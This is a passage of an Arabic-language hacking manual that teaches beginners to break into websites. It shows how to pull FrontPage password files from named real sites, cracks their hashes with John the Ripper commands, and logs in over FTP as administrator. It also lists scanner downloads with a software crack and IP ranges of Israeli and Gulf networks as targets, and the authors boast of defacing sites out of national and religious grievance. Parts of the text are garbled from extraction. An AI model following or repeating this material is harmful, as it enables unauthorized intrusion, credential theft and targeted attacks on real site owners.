fileوتذهب إلى
open webوتضيف
السم والباسوورد وعاد كذا انت الحين تقدر تعدل الملفات على كيفك
)(2
من FTP
وعليك ببرامج الـ FTPالمنتشرة
كالـ ws-ftp
والـ pro ftp
170
والمزيد ...
ويمكنك عمل الطريقة من DOSولكن البرامج أسهل لك وأضمن لك
======================================
أو..
link:adminstrators
انتهى،،،
171
" الختراق العشوائي "
>ةةةةة<
>ةةةةةة :ةةةةةةة<
/http://www.achla.co.il
http://www.reshet.co.il/data/index.vs?dw=1
/http://www.maven.co.il
/http://www.tapuz.co.il
/http://www.walla.co.il
172
http://www.info.gov.il/find.pl
المهم على كل شخص منا أن يصلح فرز للبيانات الموجوده في هذه المواقع ،يستخدم اللغه التي يتقنها
ليصنع برنامج يصلح فرز ويضعها في ملف تكست بدون اشياء ثانيه معها
العمليه الثانيه هي البحث فيها كلها عن منتج ،مثل ، /w3-msqlالطريقه سهله جدا ،أول يتم الشبك مع
بروكسي مثل proxy.isp.net.sa :8080وثم يرسل له أمر ، GETمثل ترسل للبروكسي
Accept-Language: ar-sa
(User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98
Host: www.com.il
Proxy-Connection: Keep-Alive
173
" الطريقة الصحيحة والمثلى في اختراق المواقع "
>ةةةةة<
>ةةةةةة< marwan911 :
يعني نعرف الموقع الفلني شنهو الملقم اللي شغال عليه والنظام والخدمات اللي يدعمها.
طيب
ادخله
تلقي مربع
هنا تحط فيه الموقع اللي تبي تعرف المعلومات اللي فوق
http://uptime.netcraft.com/up/graph....whitehouse.org
حلو
174
اول شيء نجرب ثغرات IIS5.0عليه )راح احطها بعد الموضوع(
إذا مانفع شيء نشوف ثغرات نظام ويندوز ) 2000راح احط الموقع بعد الموضوع(
طيب
وماتمشي إل مع ملقمات IISوهي عبارة عن عناوين طويلة تحطها بعد عنوان الموقع .راح احط امثلة
عليها.
نشوف إن كان عنده سجل زوار او منتدى او او او ونطلع ثغراتها من الموقع اللي راح ارفقه في الرد اللي
بعد الموضوع.
الملقم وهو apache 1.3.20و دعم فرونت بيج FrontPage/5.0.2.2510وهذه مليانة ثغرات
والثالث النظام وهو Linux
طيب
الملقم
اول شيء اباتشي من الملقمات الصعبة الختراق إل بعض الصدارات منها فنحط هذه على جنب.
175
داخل المجلدين راح نلقي اربع ملفات مهمة وهي service.pwdو users.pwdو authors.pwd
و adminstators.pwdويعتبر هذا اخطر ملف
طيب لو قدرنا ننزل واحد من الملفات هذه )ملحظة الثغرة هذه موجودة ب %70من المواقع الموجودة
عالنت( لو نزلناها نفتحها بالمفكرة ونلقي السطر هذا على سبيل المثال
goodyco:CalXS8USl4TGM
تنزله وتحط الملف المشفر )مع اليوزر( بمجلد واحد وتفتح الدوس وتروح لمجلد جوهن وتكتب السطر التالي
john -i PASSWORD.FILE
لكن لينكس ايش؟ فيه ريد هات و ماندريك وفيه منه إصدارت كثير وثغرات اكثر
اول شيء معرفة النظام تقدر تطلعه من ابدا وتشغيل ول telnetواكتب عنوان الموقع يطلع لك النظام فوق
نوعه وإصدارته
================
/http://neworder.box.skهذا الموقع مفيد جدا تكتب مثل )فوق بالمربع اللي عاليمين( IISاو
apacheاو منتدى واصدارته او اي برنامج ويطلع لك ثغراته
انتهى،،،
176
" نبذه يسيرة ومبسطة عن كيفية اختراق المواقع "
ركز معي
هذا سؤال يحير الجميع بالذات المبتدئين .عليك بأتجاه للموقع المراد اختراقه
حيث يجب عليك دراسة الموقع كامل من حيث عدة عوامل اهمها
تقريبا هذه اهم العوامل المتخذه كعوامل مطلوبه جدا لتنفيذ العمليه وهذه تاخذ
سبق وذكرنا السيرفر IISوالداعم لبعض المواقع وهذا امره تقريبا سهل حيث ان
حيث ان ثغرات تقريبا سهله واختراقها ايضا مرتبط بأن تكون الثغرات التي لديك
جديده و طااازه
وشوية صبر بالستعانه بال ثم ببعض البرامج المساعده وسوف تححق نجاحاتك
بأذن ال .
سيرفر apachcوهذا السيرفر قوي جدا وغالبا ل يعمل على البحث عن ثغراته
177
" )>س&ج<( في اختراق المواقع للمبتدئين "
س* :أحم أحم ,أنا كنت عايز أسألك شوية أسألة في الهاكنج.
ج* :تفضل حبيبي ,بس ياريت ماتكون عن اختراق الجهزة ,ولعب العيال هذا !!
س :2لقد سمعت كثيرا عن ثغرات الفرونت بيج ,هل يمكنك توضيح طريقة استخدام هذه الثغرة .
ج :2بالتأكيد حبي ومن عيوني الثنين D:
طبعا ثغرات الفرونت بيج بتكون موجودة في أنظمة التشغيل NT & Unixالتي يدعم سيرفراتها الـ
, FrontPageوبتمكنك من معرفة كلمة سر الدمين تبع الموقع (:
وكلمات السر هذه بتكون موجودة في الملفات التالية:
Administrator.pwd
Administrators.pwd
Authors.pwd
Users.pwd
التي بتكون عادة في المجلد _vti_pvt
مثل هذه الملف مثل(: http://www.tradesystemlab.com/_vti_pvt/service.pwd :
وبعد فتح الملف service.pwdهتلقي مكتوب بداخله هكذا تقريبا:
-FrontPage- #
tradesys:FpNTpIDWSk872
وهذه كلمة السر المشفرة واسم المستخدم (:
س :3أووووه واااااو ممتاز ,ولكن كيف أدخل على الموقع كأدمين بهذه الكلمات ؟؟ S:
ج :يمكنك استخدام برنامج اف تي بي مثل برنامج , WS_FTPأو ضع بدل wwwفي عنوان الموقع كلمة
ftpمثل هذا ftp.ebnmasr.com :وقم بموضعه في شريط العنوان ,وسيطلب منك الموقع اسم
المستخدم وكلمة المرور للموقع (:
س :4مشكور حبيبي ولكن ليش مايدخل باسم المستخدم وكلمة السر هذه :
tradesys:FpNTpIDWSk872؟؟ )(N
ج :4بكل بساطه لنها مشفرة !! ,يمكنك فك تشفيرها عن طريق برنامج مثل برنامج John The
, Ripperنزله من هناhttp://www.openwall.com/john :
س :5أها ,لكني ماأعرف أستخدم هذا البرنامج ,ممكن تشرحهولي أخي العزيز القناص لو سمحت ؟؟
ج :5لتستأذن مني ياولد !! ,أنا في الخدمة , (:شوف :انت أول ماتنزل البرنامج وتفك ضغطه ,هيكون فيه
مجلدين , doc & run :الي يهمنا هو مجلد , runشوف :عشان تسهل على نفسك وبدل ماتفتح الدوس
وتدخل على مجلد البرنامج وهالمشاكل وكمان البعض ما بيعرف يعمل هالشياء : p:
ابحث في جهازك عن command.com :وقم بنسخه والصقه في مجلد , runأوكى ؟؟
178
وجيب كلمة السر هذه tradesys:FpNTpIDWSk872 :وحطها في ملف txtباسم passwdمثل
وضعه في مجلد , runول تقم بفتح , john.exeافتح command.comواكتب فيه الوامر التالية:
<< john -single passwd.txtليبحث لك عن الكلمات السرية التي تكون مطابقه لسم المستخدم
<< john -i:Digits passwd.txtليبحث لك عن الرقام فقط
<< john -i:Alpha passwd.txtليبحث لك عن الحروف الصغيرة
<< john -i:all passwd.txtليبحث لك عن جميع الحتمالت ) ,وأنا على طول أستخدم هذا المر ,
عشان كده بتطول عملية الفك معي ( D:
وبعدما ينتهي البرنامج من فك الكلمة ستجد كلمة السر المشفرة والمفكوكه بالملف هذاjohn.pot :
س :7الحمد ل ,خلص انفكت كلمة السر ) , (Yلكن وين اسم المستخدم ؟؟
ج :7في كلمة السر هذه , tradesys:FpNTpIDWSk872 :هيكون اسم المستخدمtradesys :
) يعني الكلمة الي بتكون قبل علمة ( :
س :9طيب أنا عندي سؤالين عالجواب الي فات ده ,هأسأل واحد الول , (:ايه طريقة البحث العشوائي هذه
؟؟
ج :أحم أحم ,هذه الطريقة :انك تبحث عن ثغرة معينة في محرك بحث يستخدم الـ spidersعشان تلقي
مواقع كثيييرة فيها الثغرة هذه ,في طبعا مواقع كثيرة بتستخدم السبايدرز ,لكن لن أقولك لك على أي واحدة
منها ,ال هذا الموقع walla.co.il :وطبعا هذا موقع اسرائيلي ,عشان معظم النتائج تكون مواقع
اسرائيلية ;( .
س :11أهاااااا ,مشكور حبيبي ,كنت عايز أسألك كمان عن كيفية عمل برامج السكان على الثغرات (:
ج :11البرامج هذه بتكون فيها مجموعة كبيرة من الثغرات أو الـ , EXPLOITESوبتبدأ تجرب ثغرة
ثغرة على الموقع ,وتطلعلك النتائج , (:وفي موقع رهيييب عشان تجيب منه الـ , EXPLOITESهذا
هو. /http://www.ussrback.com :
انتهى،،،
179
" برنامج CgiScanerللبحث عن الثغرات "
>ةةةةة<
>ةةةةةة :ةة ةةةة<
رقم 1خروج.
رقم 2أظهار الكودات المستخدمة.
رقم 3بدأ البحث.
رقم 4تضع العنوان للضحية.
وأترك البرنامج وسوف يظهر لك الثغرات الموجودة فى الموقع.
وصلة البرنامج..
http://mypage.ayna.com/vox99/cgiscan3.zip
انتهى،،،
180
" شرح برنامج سوبر سكان لمعرفة المنافذ المفتوحة في
المواقع "
اي اي بي به منفذ مفتوح ومن امثلة ذلك برنامج السب سفن جولد ,,رغم ان
البرنامج وقوة اتصاله ممتازه ال ان الباحث ضعيف فنستخدم هذا البرنامج كاداة
181
ثلث خطوات تقوم بها وهي كالتالي ::
انظر اعلى اليمين تجد قائمة المنافذ ادخل قائمة المنافذ لتحديد المنفذ
رقم اثنين لكي نضيف المنفذ **ملحظه نقدر نضيف اكثر من منفذ
بعد ماننتهي من اضافة المنفذ نضغط اوكي للتأكيد ونتأكد من ان المنفذ قد
بعد ذلك نضغط ابــــــــــــدأ فتظهر لنا الي بيات والي بي الذي به منفذ مفتوح
نحصل علمة +على يساره عندما نضغط عليه يظهر لنا المنفذ المفتوح
182
وصلة البرنامج...
http://mypage.ayna.com/a7lla1/superscan.zip
<--------212.150.32.255---------------212.150.13.1أسرائيل
<----------62.0.180.255-----------------62.0.150.1أسرائيل
<--------199.203.72.255---------------199.203.75.1أسرائيل
<--------139.92.208.255---------------139.92.208.1أسرائيل
<--------192.114.42.255---------------192.114.42.1أسرائيل
<---------216.72.43.255----------------216.72.43.1أسرائيل
<-------212.143.113.255--------------212.143.113.1أسرائيل
<--------209.88.198.255---------------209.88.198.1أسرائيل
<--------212.29.238.255---------------212.29.238.1أسرائيل
<-------193.128.102.255--------------193.128.102.1أسرائيل
<-------192.117.236.255--------------192.117.236.1أسرائيل
<---------213.8.204.255----------------213.8.204.1أسرائيل
<--------212.25.120.255---------------212.25.120.1أسرائيل
<---------128.139.1.255----------------128.139.1.1أسرائيل
<------------212.2.227.255<-------------212.2.224.1السعوديه
<-----------212.26.255.225<--------------212.26.1.1السعوديه
<-----------213.238.20.255<-------------213.238.0.1السعوديه
<------------212.102.3.255<-------------212.102.1.1السعوديه
<----------212.116.195.255<-----------212.116.190.1السعوديه
<-----------212.106.70.255<------------212.106.60.1السعوديه
<-----------195.229.31.255<-------------195.229.6.1المارات
<----------195.229.255.255<-----------195.229.224.1المارات
<-----------194.170.30.255<------------194.170.30.1المارات
<-----------213.42.255.255<--------------213.42.1.1المارات
<-------------208.7.80.255<--------------208.7.70.1الكويت
<----------195.226.255.255<-----------195.226.240.1الكويت
<-----------195.39.145.255<------------195.39.130.1الكويت
<----------168.187.255.255<-------------168.187.1.1الكويت
<-----------194.133.255.25<-------------194.133.1.1قطر
<------------209.58.40.255<-------------209.58.40.1قطر
<-----------206.82.133.255<------------206.82.133.1قطر
<-----------206.49.109.255<------------206.49.109.1عمان
<-------------212.72.7.255<--------------212.72.1.1عمان
<----------193.188.200.255<------------193.188.50.1البحرين
183
انتهى،،،
http://www.safety-lab.com/SSS.exe
http://www.e3sar.net/almodammer/ShadowSecurityScanner5.35.exe
الطريقة:
========================================
بعد تحميل البرنامج وتنزيله وعمل SetUpله
افتح الكراك
وبعد ذلك ستظهر هذه الصورة:
184
+++++++++++
ٍ[] ][1اضغط ليتم تنفيذ الكراك
[] ][2بعد إتمام عملية الكراك اضغط هنا للخروج
========================================
سوف أشرح باختصار ومن يصعب عليه الفهم أرجو أن يتقدم لي بالسؤال
الشكل -1-
الشكل-2-
185
=1إضافة سياسة جديدة والمقصود بها أيقونة أخرى وهي الرقم 4ولكن تحمل اسمك )ولداعي لن تنشأ
باحث أو سياسة جديدة لك يكفيك الموجودة(
=2إعدادات لهذا الباحث وأيضا انا لأنصحك بتغيير شيء أبدا في هذا الخيار
=3حذف الموجه الجديد التي انت صممته والمقصود اليقونة التي تشبه رقم 4ولكن من تصميمك فبضغطك
هنا سوف تحذفها
=4عليك تظليله وهو المربع الذي يوجد به خصائص البحث عن كل شيء
=5لرجوع للخلف ولأظن أن هناك رجوع لنها العملية والطار الول
=6اضغطها إذا أردت المتابعة
=7إزالة الطار
الشكل-3-
186
) (1للرجوع إلى الشكل -2-
) (2الذهاب إلى العملية التالية
) (3إلغاء إكمال العملية
الشكل-4-
الشكل-5-
أثناء ضغط الزر Doneوفي الخطوة السابقة سوف يظهر هذا المربع الكبير
ومن هنا سوف نبدأ البحث عن الثغرات أنظر الشكل لتفصيل أكثر
187
الشكل-6-
بعد الضغط على Start Scanوذلك بتظليل الموقع والضغظ بزر الفأرة اليمين
وسوف يقوم البرنامج بالبحث في الموقع والمنافذ الخاصة به مع النطاقات كما هو موضح في هذا الشكل
انتهى،،،
188
في نظم صن ميكروسيستيمز
etc/shadow/
نظم يونكس بصفه عامه ))اتش بي يو اكس )) -ترو يونكس )) 64خاص بالمنفريم ونظم الريسك 64
وبعض منتجات اللفا (( (( ((
etc/shadow/
في الويندوز اكس بي البروفيشينال واصدارات الويسلر )) سيرفر -ادفانسد سيرفر ((
لن تجد الويندوز في مجلد WINNT
ولكن سيكون كالويندوز العادي .Windows
انتهى،،،
189
مقدمه :
مرت فترة طويلة منذ الدرس السابق ول اعرف لماذا مر كل هذا الوقت دون أن ابدأ في كتابة هذا الدرس ..
ربما لصعوبة الموضوع و تشعبه ..و لكن ها قد حان الوقت لمجابهة الصعوبة و التشعب و تقديم و لو حتى
فكرة بسيطة عن هذا الموضوع الممتع ..
مما سبق نستنتج أن Telnetهو مجرد وصله )مثل الهاتف( ..و انه لبد لنا من معرفة البروتوكول
المستخدم في التصال حتى ننجح في الرسال و الستقبال .كما انه لبد لنا من أن نعرف أيضا أنه لبد من
برنامج Daemonيتسمع على المنفذ المراد التصال عليه .
بدء التصال
-1قم بتشغيل Telnetو شبك على ftp.zdnet.comبالمنفذ 21
و هذا ما سيظهر لك
- Sources Codeشفرة
و السطر السابق يسمي Bannerالخاص بال FTP Daemonالمستخدم في موقع zdnetو هي
تختلف باختلف الموقع الذي سيتم التشبيك عليه .و الرقم الموجود في البداية يدل على نجاح التصال و هو
رقم ثابت .
-2الخطوة التالية هي الولوج باستخدام اسم المستخدم Usernameو كلمة السر .. Passwordبما أن
zdnetتدعم المستخدم Anonymousسيتم استخدامه في الولوج للنظام كالتالي:
ستكتب
- Sources Codeشفرة
190
user anonymous
- Sources Codeشفرة
.Guest login ok, send your complete e-mail address as password 331
- Sources Codeشفرة
pass @zorro
و بالطبع عند الولوج بالمستخدم Anonymousتقوم بإعطاء عنوان البريد اللكتروني الخاص بك ككلمة
السر ..و إذا لم ترد إعطاء بريدك فيمكنك أن تكتب أي شئ يأخذ شكل البريد )أي يحتوي على الرمز) @
و سيستجيب الخادم بالتالي
- Sources Codeشفرة
و بالطبع تلك الستجابه قد تختلف من موقع لخر ..إل في الرقم في بداية كل سطر ..
أنت الن قد قمت بالولوج إلى الخادم بنجاح .
بعد أن تمت عمليه الولوج للنظام يجب إنشاء وصله لرسال واستقبال البيانات )قائمه بالملفات الموجودة أو
الملفات ذاتها( ..إذن ما الذي كنا نفعله منذ قليل ؟!! ما قد فعلناه منذ قليل هو إنشاء وصله لرسال الوامر
للنظام و استقبال استجابة النظام على الوامر .
و لكي ننشئ تلك الوصلة ،هناك طريقتين
الولي :تنشئ هذه الطريقة الوصلة بان يرسل الزبون )أنت( رقم IPالخاص به و المنفذ المفتوح الذي
يستطيع الخادم استخدامه في إرسال البيانات .
و لكن تلك الطريقة تتطلب منك فتح أحد المنافذ على جهازك و هذا سيتطلب برنامج خاص لفتح هذا المنفذ ..
و لذلك لن نستخدم تلك الطريقة .
الثانية :تنشئ هذه الطريقة الوصلة بان يرسل الزبون المر PASV
191
- Sources Codeشفرة
PASV
و سيرد الخادم برقم IPالخاص به و المنفذ المفتوح )على الخادم بالطبع( الذي يستطيع الزبون )أنت(
التصال عليه ..
مثال
- Sources Codeشفرة
و لذلك فالخطوة التالية التي يجب على الزبون اتباعها هي فتح وصله جديده مع الخادم على المنفذ .. 3113
ولكي تقوم بمثل هذا المر يتوجب عليك فتح نافذة Telnetجديده و تشبك على ftp.zdnet.comبالمنفذ
.. 3113
إذن عندما تريد أن ترسل أحد الوامر سترسله من النافذة الولى و النافذة الثانية ستظهر بها البيانات ..
مثال
عندما ترسل المر ( LISTيستخدم لعرض محتويات الدليل( في النافذة الولى
- Sources Codeشفرة
LIST
- Sources Codeشفرة
192
و ستظهر محتويات الدليل في النافذة الثانية ثم سيتم غلق التصال في النافذة الثانية بمجرد إتمام عرض
محتويات الدليل .
و هكذا كلما أردت أن ترسل أمر عرض محتويات دليل ما أو استقبال أو إرسال ملف ما ،يجب أن تبدأ بأمر
.. PASVثم تنشئ اتصال جديدا بعد حساب رقم المنفذ باتباع الخطوات السابقة .
إلى هنا و أظن أنني قد تماديت ..و لكنني لم استطع أن امنع نفسي من مشاركتكم بهذا الموضوع الممتع
)ممتع بالنسبة إلي( .
ملحظات هامة
-لربما تتساءل الن ..أل أستطيع بدل من كل هذا الهراء أن استخدم برنامج جاهز مثل CuteFTP؟!!
بالطبع تستطيع و لكن لن يضرك أن تعلم شيئا عن البروتوكول الذي تستخدمه و ربما بعد تعلم البروتوكول
تستطيع أن تصنع برنامجك الخاص
-اقرأ الدرس مره و مرتين حتى تستوعب الفكرة تماما ثم اسأل فيما شئت
-لتعلم اكثر عن هذا الموضوع قم بزيارة المواقع التالية
http://www.vbip.com/winsock/winsock_ftp_01.asp
)ينصح به بشده(
) http://www.vbip.com/winsock/winsock_ftp_ref_01.htmينصح به بشده(
) http://www.cis.ohio-state.edu/htbin/rfc/rfc0959.htmlلمن اراد التعمق في
البروتوكول(.
انتهى،،،
193
الختراق :
~~~~~~~~~
-المقدمة .
-كيف أجمع معلومات حول الموقع ؟
-كيف يتم كشف نقاط الضعف ؟
-كيف يمكن إستغلل نقاط الضعف المكتشفه ؟
-ماهو ملف كلمة المرور password file؟
-بماذا يفيدني هذا الملف ؟
-كيف يمكن معرفة كلمة السر من خلل ملف الباسورد password file؟
-ماالفرق بين إذا كان الملف )مشفر (encryptionوإذا كان )مضلل (shadowed؟
-وماذا لو كان ملف كلمة المرور مشفر ،كيف يتم كسره ؟
-ولو كان ملف كلمة المرور مضلل ،ماذا علي ان أعمل ؟
المقدمة -:
~~~~~~~~~
أعد هذا المستند للباحثين وليس لمن أراد أن يخترق موقع فقط ! أنا أعتبر أن لديك الخبره اللزمه لفهم كل ما
أتحدث عنه ،ل تتوقع إني بقول لك نزل برنامج ) مثل ( Void Eyeأو غيره وحط لك في هذا المستند
شرح بالصور وقول لك إخترق مواقع ،العمل المقزز هذا لن نتطرق له أبدًا
194
يتم تنفيذ المر التالي في Windowsو Linuxو SunOSو FreeBSDو QNXبنفس الصيغه ،
ولكن أفضل Linuxعنها ،وهو لن لينكس يوفر كل ماتحتاجه من أدوات ...هذا المستند ل يختص بـ
Linuxلذلك لن أذكرها ،تأتي نتيجه التصال بسيرفر الحلم على بورت التلنت
----------------------
SunOS 5.7
يتضح بأن السيرفر يعمل على نظام ، SunOS 5.7بقي عليك أن تنتزع التواقيع من البورتات المتبقيه
لتعرف ما هو التطبيق وإصدارته المنصت لها )إستخدم التلنت ( ،وثم تقوم ببحث عن نقاط ضعف لها
وتحصل على شيفرات الستثمار الخاصه بها ،الخطوه التاليه هي أن تعرف ما هو ملقم الويب الذي يعمل
على هذا النظام ،نذهب الى الترمينال تبع ليونكس ونكتب
----------------------
.
.
.
Apache/1.3.* Server
.
.
----------------------
أختصرت النتيجه وتم تضليل إصدار ملقم الويب وذلك لحمايه الموقع ،اتمنى أن تستطيع كشفه بنفسك...
من المعروف من عمليه السكان بورت بأن البورتين 110و 25مفتوحين ،هذا يدل على أن في الموقع
خدمة البريد اللكتروني ،بالطبع هذا يفيدك لمعرفه smtpو popللموقع ،كل ماعليك فعله هو كتابه المر
التالي )في ( Linux
host 7lem.com
وأنتظر النتائج
ملحظه -:إذا كنت تعيش مع بن لدن ولست عائش في جو تقنيه معلومات كل ما عليك فعله هو تفجيراليميل
)على حسب ما يسمياها كثير من الناس(
ملحظه ثانيه -:إذا لم تجد في السيرفر خدمه تلنت أو أنه تم تغيير التوقيع عن طريق مثل قرصنه
النظام ....الخ ،عليك أن تستخدم quesoالداة المفضله لكشف نظام التشغيل ،وهي تعمل على ليونكس ،
لستخدامها عليك كتابه
/queso http://www.7elm.com
كل ماعليك بعد تثبيت الداة في جهازك هو كتابه quesoوثم مسافه والموقع ورقم البورت 80والذي هو
بطبيعه الحال مفتوح في جميع المواقع...يأتيك الرد بأن النظام SunOS 5.7
195
http://www.psyon.org/tools/index.html
توفر لك هذه الصفحه مجموعه من برمجيات السي جي آي التي تسهل لك المهمه ،هناك رياضيات لطلب
معلومات عن موقع ويب بإستخدام whoisوهي مفيده جدا ،على كل حال توجه الى الموقع التالي لمزيد
من التفاصيل
http://www.google.com/search?q=whois&btnG=Google+Search
196
ما قلت هذا موقع يهودي وال بدمره وصلح عليهم عنتر ولد بو شداد ،أرسلت رساله لنقطه الضعف ،
صلحت لها نسخ ولصق ،ورد علي بالشكر وقائمه بالغاني الجديده لديهم وأخذ فكره حسنه عن المسلمين
وعن العرب بدل من فكره الرهاب اللي حكوماتهم تزرعها في عقولهم
لنأخذ مثال :الموقع timduff.comهذا موقع يستحق التدمير ،وقد تم ذلك ،وهو الن تم إرجاعه ولكن
من جديد ول يحوي ال القليل من الصفحات ل تتجاوز إثنتان
سمعت عن هذا الموقع في أحد منتديات الهاكرز النجليزيه بأنه يقدم خدمه ل أعلم ما هي بالضبط ،فذهبت
للموقع لسجل واعرف ماهي ،كان التسجيل عن طريق إرسال معلومات الى بريد اللكتروني ارسلت
معلومات ،وصلني الرد بعد ساعتين تقريبا ،كا كنت أن الرد يكون كله حش وسب ،ما كنت أقراء ال كلم
كله حش وسب ،ليش ،تبين لي السبب هو ذكري كلمة ، i'm from saudi arabiaولكن لماذا كل هذا
الحقد ،ومضت ايام وكل يوم والثاني أحقد عليه أكثر وأكثر عشان عنصريته ،ال أن توفقنا ولقينا لملقم
الويب حقه نقطه ضعف في موقعي روسي ،وال الن غير مرقوعه ،تقدر تعرض كل الملفات الموجوده في
السيرفر ،وتقدر تسحب منها كل ماتريد ،عن طريق اليو آر إل هذا
الن سوف أضع النقاط الساسيه لكشف نقاط ضعف على موقع ما -:
نوع آخر ،يكون الستثمار )من الن سوف نطلق إسم إستثمار على الطريقه التي تستغل بها الثغره( يكون
الستثمار على شكل شفره )كود( مكتوب ببرنامج shفي ليونكس ،وهو ما يسمى بالعربي برنامج الغلف
وبالنجليزي shellوتكون هذه الشفره تحت ملف بالمتداد * sh.وتعمل تحت بيئه ليونكس ،وهذا النوع
من الستثمارات هو المفضل ويحسس المخترق بالقوه ونظرا لتعدد الداوت في ليونكس فإن لغه shell
اصبحت قويه فهي تقابل كتابه ملف دفعاتي في ويندوز )(bat
197
ويوجد نوع من الستثمارات ثاني وهو شفره )كود( مكتوب بلغه Cالمشهوره ،وهذا النوع غالبا ما تحدث
فيه أخطأ أثناء عمليه الترجمه ،قد تواجه كثير من المتاعب لذلك يجب أن تكون لديك خلفيه في لغه سي ،
ولترجمه هذا النوع عليك بالذهاب الى ليونكس وترجمته بإستخدام المترجم gcc
gcc Exploit.c -o Exploit
ملحظه مهمه ) يجب أن يكون المتداد للمف * c.وليس * ، C.لو كان حرف cكبتل فسوف يترجم
الستثمار وكأنه كتب في سي ، ++الشئ الثاني تأكد من توفر المكتبات )* (h.التي يتطلبها الستثمار قبل
تشغيله(
عليك زياره موقعي فهناك مستندات في البرمجه قد تنفعك
يوجد نوع ظهر مؤخرا من الستثمارات وبداء ينتشر وهو أيضا شفره ولكن مكتوبه بلغه Perlومن الممكن
أن يتم تشغيل هذا النوع من موجه الدوس في ويندوز )يجب أن تملك برنامج يفسر شفرات البيرل مثل أكتيف
بيرل(
= Exploitإستثمار
------------------------------------------------------------------------------------------------
root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin:
sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer
Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp
Admin:/usr/lib/uucp: nuucp:x:9:9:uucp
Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network
Admin:/usr/net/nls: nobody:x:60001:60001:Nobody:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x Nobody:/:
www:x:102:1001::/web:/bin/csh
mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu
sid:x:103:10::/export/home/sid:/bin/ksh
mirror:x:104:1::/home/mirror:/bin/sh admin:x:105:1::/home/admin:/bin/sh
jerome:x:106:1::/home/jerome:/bin/sh erl:x:102:1::/home/erl:/bin/sh
198
landmark:x:1000:1000::/web/landmark:/bin/ksh
------------------------------------------------------------------------------------------------
وقد تكون أكثر بكثير ،حيث أن هذا الملف الموضح بالعلى أختصر بشكل كبير ،فعند سحبه كان يحتوي على
آللف السطور ،ليس كل ملفات كلمات المرور بهذا الحجم فيوجد منها من ل يتجاوز 10أسطر وهي
الموجوده بكثره ،على العموم أنت الحين عليك تعرف بأن ملف كلمة المرور هو الذي في داخله توجد
حسابات الشخاص المرخص لهم بالدخول الى السيرفر ......
-كيف يمكن معرفة كلمة السر من خلل ملف الباسورد password file؟
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~
إضغط Ctrl + Shiftفي القسم اليمن من لوحه المفاتيح لتقراء من اليسار الى اليمين ،ثم إذهب الى
العلى حيث وضعت مثال لملف كلمة مرور تم سحبه من الموقع ... hwwilson.com
تفسير هذا السطر -:
root:x:0:1:Super-User:/:/sbin/sh
root
هذا السطر يوضخ المستخدم واللي هو الجذر root
199
x
وكلمة المرور ،ويتضح انها مضلله ،يعني مكانها العلمة ، xل تفكر في كسرها فهذا مستحيل ،لكن عليك
البحث عن ملف ثاني تم تخزين فيه كلمة المرور ،ستعرف بعد قليل كيف تفعل هذا
0
هذا هو رقم المستخدم
1
رقم المجموعه
Super-User:/:/sbin/sh
هذا مش مهم
++++++++++++++++++++++++++++
الجزء الثالث
-ماالفرق بين إذا كان الملف )مشفر (encryptionوإذا كان )مضلل (shadowed؟
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~
الملف المضلل shadow fileيكون مكان كلمة المرور رمز مثل * أو xأو #أو ! وهذا مثال لها
root:x:0:1:Super-User:/:/sbin/sh
لكن الملف المشفر تكون كلمة المرور مكتوبه ولكن مشفره مثل هذه
root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh
هنا تكون كلمة المرور المشفره هي Q71KBZlvYSnVw
~~
البرامج كثيره وأشهرها هو Crack 5.0aو john the ripperويوجد آخر بإسم jack the ripper
،إذا كنت ممن يجيدون العمل في ليونكس فهذا جيد ،عليك تنزيل ، Crack 5aوأفضل john the
ripperلمن يريد إستخدام ويندوز ،وللمعولميه فإن john the ripperعمل أيضا تحت ليونكس .....
200
\ ------------------------------------------------------------------------------------------------
------> Q2wrtUo9LPq2R
يتم مقارنه | } ---> //البدايه{ كلمة المرور | /---/المشفره مع | / 1 /أخذ كلمة من الـ wordlistالكلمات
| _____________ / 0 /المختاره حتى | }تشفير{ | | / 1 /يتم |----\ / 0 / ---------^--------
| word listالتطابق -> Q6LiJ6ct1oUBzكلمة مرور مشفره /---/الكلمة المختاره | |
_____________| \ ------song--------// ------------------إذا حدث تطابق فهذا يعني أن
كلمة المرور التي كانت مشفره
قد كسرت ..
| | -------------------------------------------------------------------------------ملحظه مهمه -:يتم
عمل دوره مثل الموضحه في العلى لكسر كلمات المرور المشفره بسرعه
}النهايه{ | 5000تجربه في الثانيه )إختبرنا john the ripperعلى معالج بسرعه (700
| -------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------
هذه الرسمه تعبت عليها عشان كذا ل أحد يسرقها
------------------------------------------------------------------------------------------------
Microsoft(R) Windows 98
).C)Copyright Microsoft Corp 1981-1998
by Sola 97,John the Ripper Version 1.3 Copyright (c) 1996
Loaded 1 password
وسوف تحفظ النتيجه في الملف john.potالموجود في نفس الدايروكتري ،وعليك حذف هذا الملف إذا
أردت البدء في عمليه كسر جديده ويمكنك تغيير إسمه أو نقله في مكان آخر بدل من حذفه إذا كنت ترى
ذلك ...
هناك طريقه اخرى للكسر وهي تسمى بـ brute forceأو بالعربي القوه العنيفه ،وهي ل تحتاج لملف
، wordlistهي تقوم بتجربه كل الحروف والرقام والرموز مع بعض في خانتان و 3خانات واربع
وخمس ..الخ حتى تصيب كلمة المرور الصحيحه ،وأنا افضل ان تستخدم ملفات wordlistفذلك لن يأخذ
معك في ال ثواني فقط لن عمليه التجربه الموضحه في الرسم بالعلى ذكرت بأنه سرعة تجربه الكلمات
يتجاوز 5000كلمة في الثانيه ،إذا لم تفلح ملفات wordlistحينها إذهب الى القوه العنيفه brute
force
المر التالي يجعل john the ripperيستخدم طريقه brute forceالسابق ذكرها
john -i passwd
201
حيث passwdهو ملف كلمة المرور المراد كسره ،إذا قمت بتجربه هذه الطريقه إضغط إنتر أثناء عمل
البرنامج لترى الى أين توصل ...
~
